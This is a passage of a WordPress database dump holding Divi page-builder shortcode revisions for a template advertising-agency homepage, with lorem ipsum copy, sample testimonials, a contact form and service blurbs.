inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-04 22:04:50','2020-07-04 22:04:50','',134,'https://52.66.212.87/2020/07/04/134-revision-v1/',0,'revision','',0),(191,1,'2020-07-04 22:20:16','2020-07-04 22:20:16','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving Big Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" 